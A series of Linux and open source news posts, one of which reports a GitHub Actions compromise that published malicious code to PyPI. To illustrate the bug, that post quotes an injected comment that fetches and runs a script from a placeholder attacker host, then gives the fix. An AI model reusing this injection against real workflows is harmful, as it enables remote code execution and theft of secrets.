Wednesday, 29 April 2026

Sovereign Tech Agency Opens Paid Standards Program for Open Source Maintainers

The Sovereign Tech Agency has launched a new pilot program called Sovereign Tech Standards, and it will be paying open source maintainers to get involved in the processes that actually shape how the internet works.

The pilot will support maintainers in actively participating in standards development at the Internet Engineering Task Force (IETF), the World Wide Web Consortium (W3C), and the International Organization for Standardization (ISO).

The problem they are trying to tackle here is one of access. Participation in bodies like the IETF, W3C, and ISO is nominally open, but the reality is different. Attending meetings, keeping up with working group discussions, and contributing meaningfully takes a lot of investment, both in time and money.

[Image: The Sovereign Tech Standards webpage]

Large tech companies are said to be sending people to these meetings as a routine business investment, but most independent open source maintainers simply do not have the time, resources, or sustained capacity to do the same.

Why is this an issue? Maintainers are the people who actually build software on top of these standards, and they know better than anyone where the specs fall apart in practice.

So, wouldn't it be reasonable to directly involve such talent with the standards themselves?

The Sovereign Tech Agency ran a survey among maintainers who had worked with such standards and found that many of them rely on the specifications in their day-to-day work. Yet very few could afford to take part in their development over the long term.

During 2026's pilot run, up to ten maintainers will be selected for a cohort running from mid-June 2026 through June 2027. They will need to put in around ten hours a week on standards work at IETF, W3C, or ISO.

Every one of the selected developers will get a monthly stipend of between €4,800 and €5,200, with standards development organization (SDO) participation fees, travel to in-person meetings, and onboarding covered.

How to apply?

To be eligible, you need to be an active maintainer of an open source project whose work is related to standards at IETF, W3C, or ISO in some way. Prior experience with standards bodies is not required, and there are no geographic restrictions either.

The selection panel scores applications on how foundational the relevant standard is, what you are planning to work on, whether your perspective is missing from that working group, and your background as a maintainer.

You should go for it if you meet those requirements.

Applications are open now and close on May 19, 2026, at 11:59 PM CEST. Review and selection will happen during May 2026, with the applicants being notified in June 2026.

The program itself is set to kick off at the end of June 2026. You can also find some additional information on the program's official page.



from It's FOSS https://ift.tt/rmYOApF

Good News! AI-first Warp Terminal is Now Open Source

Warp has open-sourced its terminal client. The code is now on GitHub, and the company wants the community involved in building it out going forward, but the contribution model looks nothing like what you would expect from an open source project.

They say the main bottleneck in development is no longer writing code but the human-led tasks, such as deciding on features and verifying that the software behaves as intended.

They are looking to agents to handle the implementation, while human contributors focus on ideas, spec work, and review. The developers are confident that Oz-generated code, guided by their own rules and verification processes, puts contributors in a good position to get features right.

If you didn't know, Oz is Warp's cloud agent orchestration platform, announced earlier this year, which lets you run multiple coding agents in parallel in the cloud with full visibility and control over what they're doing.

Announcing this move, Zach Lloyd, the CEO of Warp, added that:

Open-sourcing is fundamentally coming from our desire to build a successful business. We are competing with other highly funded, closed-source competitors, and we think opening and providing the resources for the community to improve Warp is a smart way for us to accelerate product development.
📋
Now compare the above with what Cal.com recently did.

As a refresher, Warp is a modern terminal and agentic development environment built in Rust. It runs on Linux, Windows, and macOS, with a block-based command interface and built-in support for AI coding agents like Claude Code, Codex, and Gemini CLI.

Get the sauce

[Image: The README banner of Warp's GitHub repository]

The client codebase is now live at github.com/warpdotdev/warp, and the licensing is split by component. The UI framework, consisting of the warpui_core and warpui crates, is under the MIT license, while the rest of the codebase is under the AGPLv3.

OpenAI is the founding sponsor of the repository, and the agentic contribution workflows are powered by GPT models. Keep in mind that other coding agents are welcome too, but Warp would rather you use Oz, which already has the right context and checks baked in for this workflow.

Warp is also expanding open source model support with this announcement, bringing in Kimi, MiniMax, and Qwen, plus a new "auto (open)" routing option that selects the best open model for a given task. A settings file for programmatic control and easier portability across devices is shipping too.


Suggested Read 📖: Ubuntu is Betting on AI



from It's FOSS https://ift.tt/qEdKHGw

Tuesday, 28 April 2026

LVFS Has Turned Up the Heat on Vendors Who Won't Contribute

The Linux Vendor Firmware Service, or LVFS, is what makes firmware updates on Linux not a nightmare. Hardware vendors upload their firmware directly to it, and users get those updates delivered through fwupd and tools like GNOME Software.

According to official estimates, the project has shipped over 140 million updates from 150 vendors and is a requirement for most consumer-facing Original Equipment Manufacturers (OEMs), Original Design Manufacturers (ODMs), and Independent BIOS Vendors (IBVs).

But the project is running into a dilemma that most open source projects of its scale eventually face: how to remain sustainable in the long term. 🗓📈

They need support

[Image: The LVFS dashboard, shown with demo firmware data as a placeholder.]

Right now, the Linux Foundation covers all of LVFS' hosting costs, and Red Hat funds Richard Hughes, the project's only full-time developer. Richard, along with a handful of part-time contributors, keeps over 20,000 firmware files in circulation.

Their sustainability plan flags some key issues that come with being this understaffed.

The project has no dedicated security response team, its sole maintainer has no backup, and the volume of critical work keeps growing with no one new stepping in to help.

Security vulnerabilities get handled on a best-effort basis (yikes ☠️), and very few companies are supporting fwupd core or the LVFS web service. You could call it a tragedy of the commons where everyone depends on it, but almost no one is paying for it.

The plan was published in August 2025, though LVFS had already begun rolling out changes in phases: April 2025 brought fair-use download utilization graphs to vendor pages, fair-use upload tracking came in July, and sponsorship tiers opened up in August 2025.

The April 2026 phase kicked in at the start of this month and has been live for nearly four weeks now. Any firmware page where a vendor is crossing 50,000 monthly downloads now shows an overquota warning.

[Image: LVFS' new overquota warning. Courtesy of Richard Hughes.]

Vendors below the "Startup" sponsorship level have also lost access to detailed per-firmware analytics. In August, custom LVFS API access will be cut for non-Startup vendors, with automated upload limits following in December.

How can you help?

[Image: The Premier, Startup, and Associate sponsorship tiers for the LVFS project]

LVFS is looking for vendors who use its infrastructure to pitch in. Presently, only two hold Startup sponsor status: Framework Computer and the Open Source Firmware Foundation.

What they actually need is either two full-time software engineers or $400,000 to fund the hires through the Linux Foundation, plus a separate $30,000 for hosting. The sponsorship tiers are as follows:

  • Premier: $100,000 per year
  • Startup: $10,000 per year (under 99 employees)
  • Associate: Free, but only available to registered non-profits, academic institutions, and government entities.

Both Premier and Startup tiers require an LF Silver Membership (page 28) on top of the listed fees. There is no free option for commercial hardware vendors. Alternatively, vendors can contribute a full-time engineer to work on LVFS or fwupd directly.


Suggested Read 📖: Will You Pay $119 For An Open Source KVM?



from It's FOSS https://ift.tt/CJPv5Zq

Hackers Hijacked a GitHub Actions Workflow to Push Malicious Code to PyPI

We have been routinely seeing open source projects getting hit by malicious actors with varying degrees of sophistication. Developers are often left scrambling to push out fixes in such situations.

As to why they get targeted, their attack surface is wide, maintainer bandwidth is limited, and one bad package can quietly reach thousands of users before anyone even notices.

When something slips through, developers have to yank releases, rotate credentials, and piece together what got out.

We now have a similar situation where Elementary Data's OSS Python CLI was compromised. And if you had the affected version installed, then you have some cleanup to do.

How it happened

The attack came down to a flaw in one of Elementary's GitHub Actions workflows. It was set up so that text from a PR comment was passed directly into a shell command, meaning whatever the comment contained, the runner would execute.
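
Elementary has not published the vulnerable workflow itself, so what follows is only a sketch of the general bug class, with made-up step text and URLs. In this pattern, a workflow run step splices the GitHub Actions expression ${{ github.event.comment.body }} straight into its script; the substitution happens as plain text before the shell ever starts, so a crafted comment can close the intended command and append its own:

# Hypothetical vulnerable step, paraphrased from the workflow YAML:
#   run: echo "Triage comment: ${{ github.event.comment.body }}"
# What the author expected the generated script to be:
echo "Triage comment: please rerun the failing job"

# A comment body of   "; curl -sf https://attacker.example/p.sh | sh #
# turns the generated script into this instead, running the attacker's code
# with the job's secrets (PyPI token, GITHUB_TOKEN) in scope:
echo "Triage comment: "; curl -sf https://attacker.example/p.sh | sh #"

# The usual fix is to pass untrusted text through an environment variable
# (env: COMMENT: ${{ github.event.comment.body }} in the workflow), so the
# shell only ever sees it as data:
echo "Triage comment: $COMMENT"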

At 22:10 UTC on April 24, the attacker posted a malicious comment on a pull request. The workflow ran it as code, handing over access to the runner's secrets, including the PyPI publish token and the GITHUB_TOKEN.

With those in hand, they created the branches and pull requests needed to stage a release, then kicked off Elementary's release workflow. By 22:20 UTC, elementary-data 0.23.3 was live on PyPI. A malicious Docker image was pushed four minutes later.

Who got hit

Only users who installed elementary-data 0.23.3 (now removed) from PyPI are affected, as well as anyone who pulled the compromised Docker image during the attack window.

However, Elementary Cloud, the Elementary dbt package, and every other version of the CLI are unaffected. That said, if you were running 0.23.3, the exposure is serious. The malware had access to anything the environment could reach.

The remedy

First, check your installed version:

pip show elementary-data | grep Version

If it shows 0.23.3, get rid of it and install the clean version:

pip uninstall elementary-data
pip install elementary-data==0.23.4

Update your requirements files and lockfiles to reflect that too.

You should also check for a marker file the malware leaves behind; a quick shell check is sketched after the list. If the file is present, the payload ran on that machine:

  • Linux/macOS: /tmp/.trinny-security-update
  • Windows: %TEMP%\.trinny-security-update
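
A minimal shell check for the Linux/macOS marker path; the Windows path can be inspected the same way from PowerShell or Explorer:

# Look for the marker file the malicious payload drops on Linux/macOS.
if [ -e /tmp/.trinny-security-update ]; then
    echo "Marker file found: the payload ran here. Rotate every reachable credential."
else
    echo "No marker file found."
fi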

If you find it, rotate every credential that environment had access to, and get your security team looking for any suspicious activity on those credentials.

On their end, Elementary pulled 0.23.3 from PyPI, GitHub, and the Docker registry on April 25.

They also decommissioned the compromised workflow, audited the rest of their GitHub Actions for the same type of vulnerability, regenerated all affected secrets, and moved to OIDC authentication.

They are currently working with an Israeli cybersecurity firm to conduct an investigation and step up their protection against such attacks going forward.



from It's FOSS https://ift.tt/v4Vzh7U

Linux is Getting a New Default Folder in Your Home Directory

If you are using a rolling release distro like Arch, you might have noticed that your home directory has a new member: a folder called "Projects".

For as long as I can remember, Linux has had a set of default folders under the home directory. Usually they are Documents, Music, Pictures, Videos, and Downloads. Templates, Desktop, and Public folders are also there.

Now we have a new addition in the form of "Projects".

Projects directory for your ...well...projects

[Image: The new Projects directory in Linux]

The purpose of the Projects directory is simple. It gives you a place to keep your project files, the kind of files that do not necessarily belong in Documents, Music, Pictures, or Videos: your coding projects, your 3D printing and CAD projects, and so on.

Why it is more than 'just another directory'

The addition of a standard Projects directory is not just about keeping your home folder organized. It has bigger implications.

For starters, it gives applications a predictable place to store project-related files. Just like image-related apps often default to the Pictures folder and video tools save into Videos, development tools, CAD software, and hardware design suites could use Projects as their natural default.

This can also improve interoperability between tools. An IDE could offer to create repositories in Projects by default. Build tools could assume a sensible project workspace, and installation guides or README instructions could refer to a common location instead of telling users to create arbitrary folders like ~/dev, ~/code, or ~/projects.

Sandboxed applications such as Flatpak apps may also benefit because a standardized location is easier to recognize and grant permissions for.

Not to forget, backup tools and synchronization services could treat the Projects directory as a meaningful category of data, same as Documents or Pictures.

In other words, this is not 'just another directory'. It enables better desktop workflows, and a small standardization like this may quietly improve usability across the Linux desktop over time.

This was an 11-year-old "request"

And interestingly, this isn’t a brand new idea. The concept has existed for over a decade.

Actually, the request to include a standard Projects directory was created in 2014. The reasoning from the original request still holds up today:

Currently XDG user dirs does not specify a directory for environments of projects. For software projects these usually include source code, version control, compiled binaries, test artefacts and downloaded dependencies. As they are much more than downloads and usually kept indefinitely, they do not fit in there. The benefit of defining a projects folder would be that when writing a README or install script for a project, one could automatically download the source to the user defined location, set up the build environment and install from there.

As with several other instances in the recent past, GNOME, Freedesktop, and KDE are paying attention to long-standing requests and implementing some of them.

💡
Don't like the new Projects directory? Just delete it. The xdg-user-dirs utility will not try to create it again; the configured location for it will simply fall back to your home directory.

Power users who want more control can edit the ~/.config/user-dirs.dirs configuration file to control what goes where.
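
As a rough sketch, assuming the new entry follows the existing XDG naming pattern as XDG_PROJECTS_DIR, relocating and querying it from a terminal would look something like this:

# Each entry in ~/.config/user-dirs.dirs is a single line; the new one reads:
#   XDG_PROJECTS_DIR="$HOME/Projects"

# Point it somewhere else, say an existing ~/dev folder, using an absolute path:
xdg-user-dirs-update --set PROJECTS "$HOME/dev"

# Ask where the Projects directory currently lives:
xdg-user-dir PROJECTS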

The road ahead for this change

This new standard directory arrived with the release of xdg-user-dirs version 0.20. As I mentioned earlier, people using rolling release distros might already have this change. You can see it in this screenshot from EndeavourOS:

[Image: The new Projects directory shown in a terminal]

As GNOME contributor Matthias notes, support will be added to GLib in the coming months so that Flatpak, desktops, and applications can make use of the Projects directory.

I am looking forward to it. You?

I have always created a dev directory in my home directory. This is where my coding related project files are located. It's better than keeping them under Documents because technically, these are not documents.

I think that I am not the only one who does this. I guess most of us have a projects or dev directory under Home.

Including a standard Projects directory is a good move. Not only does it remove the guesswork about where to keep such files, but various applications can also take advantage of the new directory.

It may look like a small addition, but standardizing something many Linux users already do can improve workflows, application behavior, and even documentation over time. For a simple extra folder, “Projects” could have a surprisingly large impact.



from It's FOSS https://ift.tt/RkDj37J

Ubuntu is Going Big on AI (But Not The Copilot Kind You Dread)

AI has been creeping into everything, and the Linux ecosystem is no exception. Over the last couple of years, local AI has gone from a niche curiosity to something people can actually run on their machines.

On the user side, tools like Ollama and LM Studio have made it surprisingly straightforward to pull open-weight models and run them locally without requiring a cloud subscription.

For enterprises, solutions like RHEL AI and SUSE Linux Enterprise Server have been catering to organizations that want AI woven into their infrastructure.

Now, it looks like Canonical is jumping on the bandwagon as Ubuntu moves towards AI. But before you start calling it Ubuslop or something along those lines, take a look at how they are going about it.

What's happening?

[Image: Discourse post by Jon Seager (jnsgruk) laying out the Ubuntu AI roadmap]

Jon Seager, VP of Engineering at Canonical, has published a post on Ubuntu Discourse laying out the company's AI roadmap. The short version is that AI is coming to Ubuntu; it will be local-first, and it will be built around open-weight models and open source tooling.

He laid out a framework distinguishing between two kinds of AI features: implicit and explicit. Implicit AI is about making existing OS features smarter in the background, without requiring users to learn anything new or interact with anything that looks like AI.

He gave the examples of speech-to-text and text-to-speech, both of which can be improved using local inference with open source inference tools and open weight models, running entirely on-device.

Explicit AI features are a different story. These are the more obviously AI-centric, agentic workflows that could automate troubleshooting, create documents or applications, and run scheduled maintenance on a fleet of machines.

Jon also gave everyone a look at what it could look like in practice:

Imagine being able to ask your Linux machine to troubleshoot a Wi-Fi connection issue, or to stand up an open source software forge that’s pre-configured, secured, and reachable over TLS.
One could easily imagine using such a capability as a gateway for controlling your Linux machine from other devices through a variety of mediums - be that a mobile app, text messaging, voice commands or otherwise.

The delivery mechanism for all of this is inference snaps. Rather than asking users to wrangle separate tools, sift through Hugging Face, and figure out which model format works on their hardware, Canonical wants a simple snap install to handle everything, with hardware-optimized builds served based on your silicon.

And since snaps carry the same confinement rules as everything else in the ecosystem, the models are sandboxed and cannot freely reach into your files or data.
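
None of this has shipped yet, so the commands below are purely illustrative and the snap name is made up; the real packages will depend on what Canonical publishes. The idea is that a single install pulls a build matched to your hardware, and confinement stays visible and auditable like any other snap:

# Hypothetical inference snap; the actual name is not yet known.
sudo snap install some-open-weight-model

# Snap confinement means host access must be granted through interfaces,
# which can be inspected and connected or disconnected explicitly:
snap connections some-open-weight-model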

Makes sense, I guess?

The local inference approach is what makes this worth paying attention to. The default is not a cloud call to some API that logs your prompts and charges you per token. It runs on your hardware, stays there, and does not require signing up for anything.

Of course, cloud and external services are still an option, but only as a fallback for people who specifically need them, not the assumed path. That is a bigger deal than it sounds, btw.

Most AI integration announcements from Big Tech players start from the opposite assumption—cloud first, local maybe someday.

Should you be worried?

When Linux and AI are mentioned in the same breath, your mind might naturally draw a comparison to Microsoft's infamous Copilot offering, where the default experience is cloud, the model is proprietary, and half the features quietly require a Microsoft account.

What Jon is proposing keeps the user-facing, agentic stuff strictly opt-in. The implicit features would run quietly in the background and improve things you already use. Nobody is bolting a chatbot sidebar into GNOME and calling it a "productivity feature."

But, as things go with roadmaps, decisions shift under pressure and user expectations change over time. I suggest keeping a close watch on how things develop for the rest of the year.



from It's FOSS https://ift.tt/D7ZWkeo

Microsoft Might Be Rebasing Azure on Fedora Linux

Microsoft's in-house Linux distribution, Azure Linux, may be heading for a significant overhaul. According to a recent report, the Big Tech giant is exploring the idea of rebasing Azure Linux on Fedora, which would be a notable shift in how the distribution is built and maintained.

Azure Linux, which longtime followers of the Linux space may know better as CBL-Mariner, has been Microsoft's internal Linux OS powering Azure services, WSL, Azure Local, and more since 2020.

It is already RPM-based, so a move toward Fedora would not be a complete departure from its existing foundation, but it would represent a serious overhaul.

[Image: The Fedora ELN SIG meeting conversation between Neal Gompa (conan_kudo) and Yaakov Selkowitz (yselkowitz)]

It all came to light during the recent Fedora ELN SIG meeting on April 21. During a discussion about a proposed Fedora change to build x86-64-v3 packages for Fedora 45, it was pointed out that Microsoft is one of the driving forces behind the proposal.

The change proposal was put forward jointly by Kyle Gospodnetich, a Linux engineer at Microsoft, alongside Lleyton Gray and Owen Zimmerman of Fyra Labs. Microsoft's interest appears to be tied to Azure Linux's need for x86-64-v3 performance gains, which is part of what is driving the rebase idea.
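
If you are curious whether your own machine meets the x86-64-v3 baseline these packages would target, the glibc dynamic loader can report it on reasonably recent systems (glibc 2.33 or newer); the loader path below assumes a standard x86-64 install:

# Print which x86-64 microarchitecture levels this CPU supports,
# e.g. "x86-64-v3 (supported, searched)".
/lib64/ld-linux-x86-64.so.2 --help | grep "x86-64-v"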

Fyra Labs, which is reportedly launching its own cloud service and wants x86-64-v3 support for Fedora and Ultramarine Linux, is also co-authoring the proposal.

It is worth noting that the x86-64-v3 change proposal still needs to be approved by the Fedora Engineering Steering Committee (FESCo) before anything moves forward.

There had also been talk of forking the whole distribution to achieve this, but Microsoft was steered toward working within the Fedora ecosystem instead.

On the surface, all of this sounds promising. As a Redditor pointed out, since Fedora is effectively the upstream of Red Hat Enterprise Linux, the move makes logical sense on paper.

That said, Microsoft has a history of open source commitments that lose steam over time. If they can properly follow through here, contribute meaningfully to Fedora, and not treat it as a one-way resource tap, this could genuinely be good for the ecosystem.

All of that is a big if, but it is worth watching closely.


Suggested Read 📖: Ubuntu 26.04 LTS is Here



from It's FOSS https://ift.tt/XEF6gSb